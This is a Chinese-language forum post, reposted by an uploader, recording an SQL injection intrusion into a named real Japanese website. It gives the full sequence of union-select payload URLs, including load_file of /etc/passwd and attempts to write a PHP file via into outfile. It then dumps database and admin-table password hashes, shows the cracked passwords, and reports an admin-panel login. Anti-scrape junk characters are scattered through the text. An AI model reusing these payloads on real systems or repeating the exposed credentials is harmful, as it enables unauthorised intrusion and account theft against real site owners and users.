|
|
) r! n i, u: ^; M6 \- z# U8 c* g8 ]' I
0x01. 检测 www.zuaa.jp 收集数据: m! F5 U0 s6 j1 V! ^
1 X' ^7 Y- m$ i: b6 G7 A1 }
9 }5 e4 ]3 x! s- U7 J, E. Q
whatweb
H1 M$ i1 w3 _' x% ~% V. [( |! R8 q5 a7 t0 N: e
! Z/ a7 ^* m8 j. ]8 H$ Z利用NMAP扫描
% Q; N! m% H+ T& B5 i! K3 Y7 H% [ V- {/ M! g! C$ A+ X
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 H# o, O0 q Z! {. {
0x02.找注入点
0 v6 Y) `& t* |# i找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
0 o$ J" \8 m- o8 \! P) {* M; B% L1 d5 |" Z- j3 s
h6 h' i9 N8 r
0x03.order by- ]7 ^) z1 z! b' W K0 k
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
9 G1 D8 r" E y' C
; S+ d& U% X% D% _1 ?order by 28报错,order by 27正常. b; @& [7 J/ |- {$ O& N4 S
' h [. S4 ?9 v2 m% E6 r# J
0x04. union手动查询
, j' {* e' ^2 u# V9 B) d1 yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 " m. {3 V7 \9 I4 J
添加到 27 时正常显示 7 ]- d( h0 |# R$ q* I# |! A) k2 c
& t' p: |" t5 [& W F中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
/ e" B( s: E7 w5 I7 }
7 T0 _5 P: V# A/ a j3 J3 M0x05. info:
. ~$ G; R! S5 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 C+ l' ]5 ]* G5 R6 [, c9 o# W
1 e6 E6 _$ G9 y B- x5 n) @8 Vuser: root@localhost
, i* F2 H0 m: H; w( h% Cdatabase: openpne
% c: B+ K$ E8 Uversion: 4.1.22/ t" P8 y2 E4 G- N1 H+ n7 `
os: portbld-freebsd5.4
, O' |1 `+ v. }2 f* G
! w e" I1 c& m; r0x06. root用户
5 R( M( R! f6 I# u利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
( A2 m! q: `7 _3 Z5 ~7 [http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 S+ v% u6 E8 H3 E0 ]
/ G& g- g' _+ [2 i P- p
通过工具转换2 m% ?) o7 t# C1 }$ X" b% Q3 e
( b2 Z9 y) B, S
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
- m4 N0 c/ [- Q* \
! X2 S3 J( K8 X( E0x07. 利用 into outfile0 s1 X' R0 E: N5 l
全部都失败- V2 d( Q( k$ ~. S
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% }) ~8 u3 B, h: X0 I6 o* L. P8 s7 g" P* y# \
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php t( z' Y5 c3 i4 j
A8 b- H5 A$ B
页面显示“MDB2 Error:syntax error”
0 { t' `7 K9 S J& I4 m' _2 Q0 o# S" U
0x08. 利用 mysql 4.1
$ g" n6 M' d! t* ^猜常规表名,字段未果 工具 sqlmap; U- d2 \1 v. B$ x& P
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
" v3 F& Z+ k" j; t/ w; _5 ^8 d- k" q. W7 E) z$ t) `
6 d y1 f* R0 A' F! _) f
# V/ D/ |% i, ^! S2 o7 n b
0x09. 查找后台. { @( m+ P4 ^/ Z a Z
利用 现有的各种 后台工具尝试都不行
! ^4 k) [1 ?3 K E
& G! @9 [' C1 O" c5 N0x10. MySL外联方法# A# J) {- c) \3 d! [* c
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
. w8 ~- f3 Q/ N可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user1 Y d b& K, U, x u2 f' k! G
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
) {( g; Z+ f1 f; K4 ?1 N
" f- w; {6 g( l X$ p% \! n+ \这个可以在 www.cmd5.com 解密2 a5 e! Y. [: @
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009$ W( E- a) m3 h! H# h2 T5 Y
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
, D% k: l! Y; T Q+ b3 M7 ^openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
" V! w% m: K( X( w8 \zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???) D( o. a0 N$ p3 Z5 E, |' @
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知% u, H2 D/ V6 i3 Y1 c3 V k& W# D; m
. e- l7 Z! r- E0 G+ i
; H% K4 y' K& Z+ r2 q# q4 n0x11. 网站突破
% I! O% U, T% t# ^6 M9 d4 s发现网站的源程序 openpne, google 下载 openpne 源码
1 D: y; U; A2 R; H1 G1 |1 {% x
9 ?. i$ j1 f V0 e4 x* p4 j" @4 f$ E' ]/ S1 t- z% e
0x12. 默认信息利用, s" Y* e3 g" ?6 g$ {
http://sns.zuaa.jp/?m=admin&a=page_login& Z& ?4 U2 X+ ?" D% m
3 C9 O0 e$ [7 i. W表名 (c_admin_user) ,字段名(username,password)
. m* r. y" r- Q4 S Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 z5 }" R0 H3 F: {7 N; n4 B+ E$ ^) a% h$ t5 D/ W. I3 m
解密
3 I/ `8 p; ~6 X9 M- J+ vzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa20097 L [ w3 q& `* {8 o2 i H
zuaajp:c0923ec5857796a393da99905008c176, zju18970 R2 O/ y) p. W5 t
/ h# |' a7 T/ y7 M) U4 j5 j @
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持) u' N. _$ d9 p7 `
! N: H/ S8 a% O; d+ A
0x13. 登录后台
* {* e" Q G* b" J2 `4 N1 G: E' g$ o( m7 D
" p. ]6 ^1 K5 c( b1 F
; Q+ H8 d6 z/ `3 O0 k; c5 ]0x14. 小结
( T& A' p2 l9 L' V5 D利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
- W2 q5 [! C6 w) [& p% E, l& s" n感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点: \4 ?% c0 Q$ u: G3 P3 q) V% ^' e1 B
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
8 V" ] T5 L3 }; z4 ?中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
4 k6 s+ G* X5 z
2 \8 M: k- \! A# i( P) F7 r最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!+ P$ {& R; |& s; Z
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|